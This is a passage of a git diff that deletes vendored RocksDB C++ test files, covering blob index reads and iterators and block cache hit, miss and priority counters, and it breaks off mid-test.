-      ASSERT_OK(PutBlobIndex(&batch, "key" + ToString(i), "blob_index"));
-    }
-    ASSERT_OK(Write(&batch));
-    // Avoid blob values from being purged.
-    const Snapshot* snapshot = dbfull()->GetSnapshot();
-    ASSERT_OK(Put("key1", "new_value"));
-    ASSERT_OK(Merge("key2", "a"));
-    ASSERT_OK(Merge("key2", "b"));
-    ASSERT_OK(Merge("key2", "c"));
-    ASSERT_OK(Delete("key3"));
-    ASSERT_OK(SingleDelete("key4"));
-    ASSERT_OK(Delete("key5"));
-    ASSERT_OK(Merge("key5", "a"));
-    ASSERT_OK(Merge("key5", "b"));
-    ASSERT_OK(Merge("key5", "c"));
-    ASSERT_OK(dbfull()->DeleteRange(WriteOptions(), cfh(), "key6", "key9"));
-    MoveDataTo(tier);
-    for (int i = 0; i < 10; i++) {
-      ASSERT_EQ("blob_index", GetBlobIndex("key" + ToString(i), snapshot));
-    }
-    ASSERT_EQ("new_value", Get("key1"));
-    ASSERT_EQ("NOT_SUPPORTED", GetImpl("key2"));
-    ASSERT_EQ("NOT_FOUND", Get("key3"));
-    ASSERT_EQ("NOT_FOUND", Get("key4"));
-    ASSERT_EQ("a,b,c", GetImpl("key5"));
-    for (int i = 6; i < 9; i++) {
-      ASSERT_EQ("NOT_FOUND", Get("key" + ToString(i)));
-    }
-    ASSERT_EQ("blob_index", GetBlobIndex("key9"));
-    dbfull()->ReleaseSnapshot(snapshot);
-  }
-}
-
-// Iterator should get blob value if allow_blob flag is set,
-// otherwise return Status::NotSupported status.
-TEST_F(DBBlobIndexTest, Iterate) {
-  const std::vector<std::vector<ValueType>> data = {
-      /*00*/ {kTypeValue},
-      /*01*/ {kTypeBlobIndex},
-      /*02*/ {kTypeValue},
-      /*03*/ {kTypeBlobIndex, kTypeValue},
-      /*04*/ {kTypeValue},
-      /*05*/ {kTypeValue, kTypeBlobIndex},
-      /*06*/ {kTypeValue},
-      /*07*/ {kTypeDeletion, kTypeBlobIndex},
-      /*08*/ {kTypeValue},
-      /*09*/ {kTypeSingleDeletion, kTypeBlobIndex},
-      /*10*/ {kTypeValue},
-      /*11*/ {kTypeMerge, kTypeMerge, kTypeMerge, kTypeBlobIndex},
-      /*12*/ {kTypeValue},
-      /*13*/
-      {kTypeMerge, kTypeMerge, kTypeMerge, kTypeDeletion, kTypeBlobIndex},
-      /*14*/ {kTypeValue},
-      /*15*/ {kTypeBlobIndex},
-      /*16*/ {kTypeValue},
-  };
-
-  auto get_key = [](int index) {
-    char buf[20];
-    snprintf(buf, sizeof(buf), "%02d", index);
-    return "key" + std::string(buf);
-  };
-
-  auto get_value = [&](int index, int version) {
-    return get_key(index) + "_value" + ToString(version);
-  };
-
-  auto check_iterator = [&](Iterator* iterator, Status::Code expected_status,
-                            const Slice& expected_value) {
-    ASSERT_EQ(expected_status, iterator->status().code());
-    if (expected_status == Status::kOk) {
-      ASSERT_TRUE(iterator->Valid());
-      ASSERT_EQ(expected_value, iterator->value());
-    } else {
-      ASSERT_FALSE(iterator->Valid());
-    }
-  };
-
-  auto create_normal_iterator = [&]() -> Iterator* {
-    return dbfull()->NewIterator(ReadOptions());
-  };
-
-  auto create_blob_iterator = [&]() -> Iterator* { return GetBlobIterator(); };
-
-  auto check_is_blob = [&](bool is_blob) {
-    return [is_blob](Iterator* iterator) {
-      ASSERT_EQ(is_blob,
-                reinterpret_cast<ArenaWrappedDBIter*>(iterator)->IsBlob());
-    };
-  };
-
-  auto verify = [&](int index, Status::Code expected_status,
-                    const Slice& forward_value, const Slice& backward_value,
-                    std::function<Iterator*()> create_iterator,
-                    std::function<void(Iterator*)> extra_check = nullptr) {
-    // Seek
-    auto* iterator = create_iterator();
-    ASSERT_OK(iterator->Refresh());
-    iterator->Seek(get_key(index));
-    check_iterator(iterator, expected_status, forward_value);
-    if (extra_check) {
-      extra_check(iterator);
-    }
-    delete iterator;
-
-    // Next
-    iterator = create_iterator();
-    ASSERT_OK(iterator->Refresh());
-    iterator->Seek(get_key(index - 1));
-    ASSERT_TRUE(iterator->Valid());
-    iterator->Next();
-    check_iterator(iterator, expected_status, forward_value);
-    if (extra_check) {
-      extra_check(iterator);
-    }
-    delete iterator;
-
-    // SeekForPrev
-    iterator = create_iterator();
-    ASSERT_OK(iterator->Refresh());
-    iterator->SeekForPrev(get_key(index));
-    check_iterator(iterator, expected_status, backward_value);
-    if (extra_check) {
-      extra_check(iterator);
-    }
-    delete iterator;
-
-    // Prev
-    iterator = create_iterator();
-    iterator->Seek(get_key(index + 1));
-    ASSERT_TRUE(iterator->Valid());
-    iterator->Prev();
-    check_iterator(iterator, expected_status, backward_value);
-    if (extra_check) {
-      extra_check(iterator);
-    }
-    delete iterator;
-  };
-
-  for (auto tier : {Tier::kMemtable} /*kAllTiers*/) {
-    // Avoid values from being purged.
-    std::vector<const Snapshot*> snapshots;
-    DestroyAndReopen(GetTestOptions());
-
-    // fill data
-    for (int i = 0; i < static_cast<int>(data.size()); i++) {
-      for (int j = static_cast<int>(data[i].size()) - 1; j >= 0; j--) {
-        std::string key = get_key(i);
-        std::string value = get_value(i, j);
-        WriteBatch batch;
-        switch (data[i][j]) {
-          case kTypeValue:
-            ASSERT_OK(Put(key, value));
-            break;
-          case kTypeDeletion:
-            ASSERT_OK(Delete(key));
-            break;
-          case kTypeSingleDeletion:
-            ASSERT_OK(SingleDelete(key));
-            break;
-          case kTypeMerge:
-            ASSERT_OK(Merge(key, value));
-            break;
-          case kTypeBlobIndex:
-            ASSERT_OK(PutBlobIndex(&batch, key, value));
-            ASSERT_OK(Write(&batch));
-            break;
-          default:
-            assert(false);
-        };
-      }
-      snapshots.push_back(dbfull()->GetSnapshot());
-    }
-    ASSERT_OK(
-        dbfull()->DeleteRange(WriteOptions(), cfh(), get_key(15), get_key(16)));
-    snapshots.push_back(dbfull()->GetSnapshot());
-    MoveDataTo(tier);
-
-    // Normal iterator
-    verify(1, Status::kNotSupported, "", "", create_normal_iterator);
-    verify(3, Status::kNotSupported, "", "", create_normal_iterator);
-    verify(5, Status::kOk, get_value(5, 0), get_value(5, 0),
-           create_normal_iterator);
-    verify(7, Status::kOk, get_value(8, 0), get_value(6, 0),
-           create_normal_iterator);
-    verify(9, Status::kOk, get_value(10, 0), get_value(8, 0),
-           create_normal_iterator);
-    verify(11, Status::kNotSupported, "", "", create_normal_iterator);
-    verify(13, Status::kOk,
-           get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0),
-           get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0),
-           create_normal_iterator);
-    verify(15, Status::kOk, get_value(16, 0), get_value(14, 0),
-           create_normal_iterator);
-
-    // Iterator with blob support
-    verify(1, Status::kOk, get_value(1, 0), get_value(1, 0),
-           create_blob_iterator, check_is_blob(true));
-    verify(3, Status::kOk, get_value(3, 0), get_value(3, 0),
-           create_blob_iterator, check_is_blob(true));
-    verify(5, Status::kOk, get_value(5, 0), get_value(5, 0),
-           create_blob_iterator, check_is_blob(false));
-    verify(7, Status::kOk, get_value(8, 0), get_value(6, 0),
-           create_blob_iterator, check_is_blob(false));
-    verify(9, Status::kOk, get_value(10, 0), get_value(8, 0),
-           create_blob_iterator, check_is_blob(false));
-    verify(11, Status::kNotSupported, "", "", create_blob_iterator);
-    verify(13, Status::kOk,
-           get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0),
-           get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0),
-           create_blob_iterator, check_is_blob(false));
-    verify(15, Status::kOk, get_value(16, 0), get_value(14, 0),
-           create_blob_iterator, check_is_blob(false));
-
-    for (auto* snapshot : snapshots) {
-      dbfull()->ReleaseSnapshot(snapshot);
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_block_cache_test.cc b/thirdparty/rocksdb/db/db_block_cache_test.cc
deleted file mode 100644
index 169cadc..0000000
--- a/thirdparty/rocksdb/db/db_block_cache_test.cc
+++ /dev/null
@@ -1,579 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include <cstdlib>
-#include "cache/lru_cache.h"
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class DBBlockCacheTest : public DBTestBase {
- private:
-  size_t miss_count_ = 0;
-  size_t hit_count_ = 0;
-  size_t insert_count_ = 0;
-  size_t failure_count_ = 0;
-  size_t compressed_miss_count_ = 0;
-  size_t compressed_hit_count_ = 0;
-  size_t compressed_insert_count_ = 0;
-  size_t compressed_failure_count_ = 0;
-
- public:
-  const size_t kNumBlocks = 10;
-  const size_t kValueSize = 100;
-
-  DBBlockCacheTest() : DBTestBase("/db_block_cache_test") {}
-
-  BlockBasedTableOptions GetTableOptions() {
-    BlockBasedTableOptions table_options;
-    // Set a small enough block size so that each key-value get its own block.
-    table_options.block_size = 1;
-    return table_options;
-  }
-
-  Options GetOptions(const BlockBasedTableOptions& table_options) {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.avoid_flush_during_recovery = false;
-    // options.compression = kNoCompression;
-    options.statistics = rocksdb::CreateDBStatistics();
-    options.table_factory.reset(new BlockBasedTableFactory(table_options));
-    return options;
-  }
-
-  void InitTable(const Options& options) {
-    std::string value(kValueSize, 'a');
-    for (size_t i = 0; i < kNumBlocks; i++) {
-      ASSERT_OK(Put(ToString(i), value.c_str()));
-    }
-  }
-
-  void RecordCacheCounters(const Options& options) {
-    miss_count_ = TestGetTickerCount(options, BLOCK_CACHE_MISS);
-    hit_count_ = TestGetTickerCount(options, BLOCK_CACHE_HIT);
-    insert_count_ = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    failure_count_ = TestGetTickerCount(options, BLOCK_CACHE_ADD_FAILURES);
-    compressed_miss_count_ =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS);
-    compressed_hit_count_ =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_HIT);
-    compressed_insert_count_ =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_ADD);
-    compressed_failure_count_ =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_ADD_FAILURES);
-  }
-
-  void CheckCacheCounters(const Options& options, size_t expected_misses,
-                          size_t expected_hits, size_t expected_inserts,
-                          size_t expected_failures) {
-    size_t new_miss_count = TestGetTickerCount(options, BLOCK_CACHE_MISS);
-    size_t new_hit_count = TestGetTickerCount(options, BLOCK_CACHE_HIT);
-    size_t new_insert_count = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    size_t new_failure_count =
-        TestGetTickerCount(options, BLOCK_CACHE_ADD_FAILURES);
-    ASSERT_EQ(miss_count_ + expected_misses, new_miss_count);
-    ASSERT_EQ(hit_count_ + expected_hits, new_hit_count);
-    ASSERT_EQ(insert_count_ + expected_inserts, new_insert_count);
-    ASSERT_EQ(failure_count_ + expected_failures, new_failure_count);
-    miss_count_ = new_miss_count;
-    hit_count_ = new_hit_count;
-    insert_count_ = new_insert_count;
-    failure_count_ = new_failure_count;
-  }
-
-  void CheckCompressedCacheCounters(const Options& options,
-                                    size_t expected_misses,
-                                    size_t expected_hits,
-                                    size_t expected_inserts,
-                                    size_t expected_failures) {
-    size_t new_miss_count =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS);
-    size_t new_hit_count =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_HIT);
-    size_t new_insert_count =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_ADD);
-    size_t new_failure_count =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_ADD_FAILURES);
-    ASSERT_EQ(compressed_miss_count_ + expected_misses, new_miss_count);
-    ASSERT_EQ(compressed_hit_count_ + expected_hits, new_hit_count);
-    ASSERT_EQ(compressed_insert_count_ + expected_inserts, new_insert_count);
-    ASSERT_EQ(compressed_failure_count_ + expected_failures, new_failure_count);
-    compressed_miss_count_ = new_miss_count;
-    compressed_hit_count_ = new_hit_count;
-    compressed_insert_count_ = new_insert_count;
-    compressed_failure_count_ = new_failure_count;
-  }
-};
-
-TEST_F(DBBlockCacheTest, TestWithoutCompressedBlockCache) {
-  ReadOptions read_options;
-  auto table_options = GetTableOptions();
-  auto options = GetOptions(table_options);
-  InitTable(options);
-
-  std::shared_ptr<Cache> cache = NewLRUCache(0, 0, false);
-  table_options.block_cache = cache;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  Reopen(options);
-  RecordCacheCounters(options);
-
-  std::vector<std::unique_ptr<Iterator>> iterators(kNumBlocks - 1);
-  Iterator* iter = nullptr;
-
-  // Load blocks into cache.
-  for (size_t i = 0; i < kNumBlocks - 1; i++) {
-    iter = db_->NewIterator(read_options);
-    iter->Seek(ToString(i));
-    ASSERT_OK(iter->status());
-    CheckCacheCounters(options, 1, 0, 1, 0);
-    iterators[i].reset(iter);
-  }
-  size_t usage = cache->GetUsage();
-  ASSERT_LT(0, usage);
-  cache->SetCapacity(usage);
-  ASSERT_EQ(usage, cache->GetPinnedUsage());
-
-  // Test with strict capacity limit.
-  cache->SetStrictCapacityLimit(true);
-  iter = db_->NewIterator(read_options);
-  iter->Seek(ToString(kNumBlocks - 1));
-  ASSERT_TRUE(iter->status().IsIncomplete());
-  CheckCacheCounters(options, 1, 0, 0, 1);
-  delete iter;
-  iter = nullptr;
-
-  // Release interators and access cache again.
-  for (size_t i = 0; i < kNumBlocks - 1; i++) {
-    iterators[i].reset();
-    CheckCacheCounters(options, 0, 0, 0, 0);
-  }
-  ASSERT_EQ(0, cache->GetPinnedUsage());
-  for (size_t i = 0; i < kNumBlocks - 1; i++) {
-    iter = db_->NewIterator(read_options);
-    iter->Seek(ToString(i));
-    ASSERT_OK(iter->status());
-    CheckCacheCounters(options, 0, 1, 0, 0);
-    iterators[i].reset(iter);
-  }
-}
-
-#ifdef SNAPPY
-TEST_F(DBBlockCacheTest, TestWithCompressedBlockCache) {
-  ReadOptions read_options;
-  auto table_options = GetTableOptions();
-  auto options = GetOptions(table_options);
-  options.compression = CompressionType::kSnappyCompression;
-  InitTable(options);
-
-  std::shared_ptr<Cache> cache = NewLRUCache(0, 0, false);
-  std::shared_ptr<Cache> compressed_cache = NewLRUCache(1 << 25, 0, false);
-  table_options.block_cache = cache;
-  table_options.block_cache_compressed = compressed_cache;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  Reopen(options);
-  RecordCacheCounters(options);
-
-  std::vector<std::unique_ptr<Iterator>> iterators(kNumBlocks - 1);
-  Iterator* iter = nullptr;
-
-  // Load blocks into cache.
-  for (size_t i = 0; i < kNumBlocks - 1; i++) {
-    iter = db_->NewIterator(read_options);
-    iter->Seek(ToString(i));
-    ASSERT_OK(iter->status());
-    CheckCacheCounters(options, 1, 0, 1, 0);
-    CheckCompressedCacheCounters(options, 1, 0, 1, 0);
-    iterators[i].reset(iter);
-  }
-  size_t usage = cache->GetUsage();
-  ASSERT_LT(0, usage);
-  ASSERT_EQ(usage, cache->GetPinnedUsage());
-  size_t compressed_usage = compressed_cache->GetUsage();
-  ASSERT_LT(0, compressed_usage);
-  // Compressed block cache cannot be pinned.
-  ASSERT_EQ(0, compressed_cache->GetPinnedUsage());
-
-  // Set strict capacity limit flag. Now block will only load into compressed
-  // block cache.
-  cache->SetCapacity(usage);
-  cache->SetStrictCapacityLimit(true);
-  ASSERT_EQ(usage, cache->GetPinnedUsage());
-  iter = db_->NewIterator(read_options);
-  iter->Seek(ToString(kNumBlocks - 1));
-  ASSERT_TRUE(iter->status().IsIncomplete());
-  CheckCacheCounters(options, 1, 0, 0, 1);
-  CheckCompressedCacheCounters(options, 1, 0, 1, 0);
-  delete iter;
-  iter = nullptr;
-
-  // Clear strict capacity limit flag. This time we shall hit compressed block
-  // cache.
-  cache->SetStrictCapacityLimit(false);
-  iter = db_->NewIterator(read_options);
-  iter->Seek(ToString(kNumBlocks - 1));
-  ASSERT_OK(iter->status());
-  CheckCacheCounters(options, 1, 0, 1, 0);
-  CheckCompressedCacheCounters(options, 0, 1, 0, 0);
-  delete iter;
-  iter = nullptr;
-}
-#endif  // SNAPPY
-
-#ifndef ROCKSDB_LITE
-
-// Make sure that when options.block_cache is set, after a new table is
-// created its index/filter blocks are added to block cache.
-TEST_F(DBBlockCacheTest, IndexAndFilterBlocksOfNewTableAddedToCache) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.cache_index_and_filter_blocks = true;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "key", "val"));
-  // Create a new table.
-  ASSERT_OK(Flush(1));
-
-  // index/filter blocks added to block cache right after table creation.
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(2, /* only index/filter were added */
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_DATA_MISS));
-  uint64_t int_num;
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_EQ(int_num, 0U);
-
-  // Make sure filter block is in cache.
-  std::string value;
-  ReadOptions ropt;
-  db_->KeyMayExist(ReadOptions(), handles_[1], "key", &value);
-
-  // Miss count should remain the same.
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-
-  db_->KeyMayExist(ReadOptions(), handles_[1], "key", &value);
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(2, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-
-  // Make sure index block is in cache.
-  auto index_block_hit = TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT);
-  value = Get(1, "key");
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(index_block_hit + 1,
-            TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-
-  value = Get(1, "key");
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(index_block_hit + 2,
-            TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-}
-
-TEST_F(DBBlockCacheTest, IndexAndFilterBlocksStats) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.cache_index_and_filter_blocks = true;
-  // 200 bytes are enough to hold the first two blocks
-  std::shared_ptr<Cache> cache = NewLRUCache(200, 0, false);
-  table_options.block_cache = cache;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "key", "val"));
-  // Create a new table
-  ASSERT_OK(Flush(1));
-  size_t index_bytes_insert =
-      TestGetTickerCount(options, BLOCK_CACHE_INDEX_BYTES_INSERT);
-  size_t filter_bytes_insert =
-      TestGetTickerCount(options, BLOCK_CACHE_FILTER_BYTES_INSERT);
-  ASSERT_GT(index_bytes_insert, 0);
-  ASSERT_GT(filter_bytes_insert, 0);
-  ASSERT_EQ(cache->GetUsage(), index_bytes_insert + filter_bytes_insert);
-  // set the cache capacity to the current usage
-  cache->SetCapacity(index_bytes_insert + filter_bytes_insert);
-  ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_INDEX_BYTES_EVICT), 0);
-  ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_FILTER_BYTES_EVICT), 0);
-  ASSERT_OK(Put(1, "key2", "val"));
-  // Create a new table
-  ASSERT_OK(Flush(1));
-  // cache evicted old index and block entries
-  ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_INDEX_BYTES_INSERT),
-            index_bytes_insert);
-  ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_FILTER_BYTES_INSERT),
-            filter_bytes_insert);
-  ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_INDEX_BYTES_EVICT),
-            index_bytes_insert);
-  ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_FILTER_BYTES_EVICT),
-            filter_bytes_insert);
-}
-
-namespace {
-
-// A mock cache wraps LRUCache, and record how many entries have been
-// inserted for each priority.
-class MockCache : public LRUCache {
- public:
-  static uint32_t high_pri_insert_count;
-  static uint32_t low_pri_insert_count;
-
-  MockCache() : LRUCache(1 << 25, 0, false, 0.0) {}
-
-  virtual Status Insert(const Slice& key, void* value, size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Handle** handle, Priority priority) override {
-    if (priority == Priority::LOW) {
-      low_pri_insert_count++;
-    } else {
-      high_pri_insert_count++;
-    }
-    return LRUCache::Insert(key, value, charge, deleter, handle, priority);
-  }
-};
-
-uint32_t MockCache::high_pri_insert_count = 0;
-uint32_t MockCache::low_pri_insert_count = 0;
-
-}  // anonymous namespace
-
-TEST_F(DBBlockCacheTest, IndexAndFilterBlocksCachePriority) {
-  for (auto priority : {Cache::Priority::LOW, Cache::Priority::HIGH}) {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.statistics = rocksdb::CreateDBStatistics();
-    BlockBasedTableOptions table_options;
-    table_options.cache_index_and_filter_blocks = true;
-    table_options.block_cache.reset(new MockCache());
-    table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-    table_options.cache_index_and_filter_blocks_with_high_priority =
-        priority == Cache::Priority::HIGH ? true : false;
-    options.table_factory.reset(new BlockBasedTableFactory(table_options));
-    DestroyAndReopen(options);
-
-    MockCache::high_pri_insert_count = 0;
-    MockCache::low_pri_insert_count = 0;
-
-    // Create a new table.
-    ASSERT_OK(Put("foo", "value"));
-    ASSERT_OK(Put("bar", "value"));
-    ASSERT_OK(Flush());
-    ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-    // index/filter blocks added to block cache right after table creation.
-    ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(2, /* only index/filter were added */
-              TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_DATA_MISS));
-    if (priority == Cache::Priority::LOW) {
-      ASSERT_EQ(0, MockCache::high_pri_insert_count);
-      ASSERT_EQ(2, MockCache::low_pri_insert_count);
-    } else {
-      ASSERT_EQ(2, MockCache::high_pri_insert_count);
-      ASSERT_EQ(0, MockCache::low_pri_insert_count);
-    }
-
-    // Access data block.
-    ASSERT_EQ("value", Get("foo"));
-
-    ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(3, /*adding data block*/
-              TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_DATA_MISS));
-
-    // Data block should be inserted with low priority.
-    if (priority == Cache::Priority::LOW) {
-      ASSERT_EQ(0, MockCache::high_pri_insert_count);
-      ASSERT_EQ(3, MockCache::low_pri_insert_count);
-    } else {
-      ASSERT_EQ(2, MockCache::high_pri_insert_count);
-      ASSERT_EQ(1, MockCache::low_pri_insert_count);
-    }
-  }
-}
-
-TEST_F(DBBlockCacheTest, ParanoidFileChecks) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.level0_file_num_compaction_trigger = 2;
-  options.paranoid_file_checks = true;
-  BlockBasedTableOptions table_options;
-  table_options.cache_index_and_filter_blocks = false;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "1_key", "val"));
-  ASSERT_OK(Put(1, "9_key", "val"));
-  // Create a new table.
-  ASSERT_OK(Flush(1));
-  ASSERT_EQ(1, /* read and cache data block */
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-  ASSERT_OK(Put(1, "1_key2", "val2"));
-  ASSERT_OK(Put(1, "9_key2", "val2"));
-  // Create a new SST file. This will further trigger a compaction
-  // and generate another file.
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(3, /* Totally 3 files created up to now */
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-  // After disabling options.paranoid_file_checks. NO further block
-  // is added after generating a new file.
-  ASSERT_OK(
-      dbfull()->SetOptions(handles_[1], {{"paranoid_file_checks", "false"}}));
-
-  ASSERT_OK(Put(1, "1_key3", "val3"));
-  ASSERT_OK(Put(1, "9_key3", "val3"));
-  ASSERT_OK(Flush(1));
-  ASSERT_OK(Put(1, "1_key4", "val4"));
-  ASSERT_OK(Put(1, "9_key4", "val4"));
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(3, /* Totally 3 files created up to now */
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-}
-
-TEST_F(DBBlockCacheTest, CompressedCache) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-  int num_iter = 80;
-
-  // Run this test three iterations.
-  // Iteration 1: only a uncompressed block cache
-  // Iteration 2: only a compressed block cache
-  // Iteration 3: both block cache and compressed cache
-  // Iteration 4: both block cache and compressed cache, but DB is not
-  // compressed
-  for (int iter = 0; iter < 4; iter++) {
-    Options options = CurrentOptions();
-    options.write_buffer_size = 64 * 1024;  // small write buffer
-    options.statistics = rocksdb::CreateDBStatistics();
-
-    BlockBasedTableOptions table_options;
-    switch (iter) {
-      case 0:
-        // only uncompressed block cache
-        table_options.block_cache = NewLRUCache(8 * 1024);
-        table_options.block_cache_compressed = nullptr;
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 1:
-        // no block cache, only compressed cache
-        table_options.no_block_cache = true;
-        table_options.block_cache = nullptr;
-        table_options.block_cache_compressed = NewLRUCache(8 * 1024);
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 2:
-        // both compressed and uncompressed block cache
-        table_options.block_cache = NewLRUCache(1024);
-        table_options.block_cache_compressed = NewLRUCache(8 * 1024);
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 3:
-        // both block cache and compressed cache, but DB is not compressed
-        // also, make block cache sizes bigger, to trigger block cache hits
-        table_options.block_cache = NewLRUCache(1024 * 1024);
-        table_options.block_cache_compressed = NewLRUCache(8 * 1024 * 1024);
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        options.compression = kNoCompression;
-        break;
-      default:
-        FAIL();
-    }
-    CreateAndReopenWithCF({"pikachu"}, options);
-    // default column family doesn't have block cache
-    Options no_block_cache_opts;
-    no_block_cache_opts.statistics = options.statistics;
-    no_block_cache_opts = CurrentOptions(no_block_cache_opts);
-    BlockBasedTableOptions table_options_no_bc;
-    table_options_no_bc.no_block_cache = true;
-    no_block_cache_opts.table_factory.reset(
-        NewBlockBasedTableFactory(table_options_no_bc));
-    ReopenWithColumnFamilies(
-        {"default", "pikachu"},
-        std::vector<Options>({no_block_cache_opts, options}));
-
-    Random rnd(301);
-
-    // Write 8MB (80 values, each 100K)
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    std::vector<std::string> values;
-    std::string str;
-    for (int i = 0; i < num_iter; i++) {
-      if (i % 4 == 0) {  // high compression ratio
-        str = RandomString(&rnd, 1000);
-      }
-      values.push_back(str);
-      ASSERT_OK(Put(1, Key(i), values[i]));
-    }
-
-    // flush all data from memtable so that reads are from block cache
-    ASSERT_OK(Flush(1));
-
-    for (int i = 0; i < num_iter; i++) {
-      ASSERT_EQ(Get(1, Key(i)), values[i]);
-    }
-
-    // check that we triggered the appropriate code paths in the cache
-    switch (iter) {
-      case 0:
-        // only uncompressed block cache
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_MISS), 0);
-        ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS), 0);
-        break;
-      case 1:
-        // no block cache, only compressed cache
-        ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_MISS), 0);
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS), 0);
-        break;
-      case 2:
-        // both compressed and uncompressed block cache
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_MISS), 0);
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS), 0);
-        break;
-      case 3:
-        // both compressed and uncompressed block cache
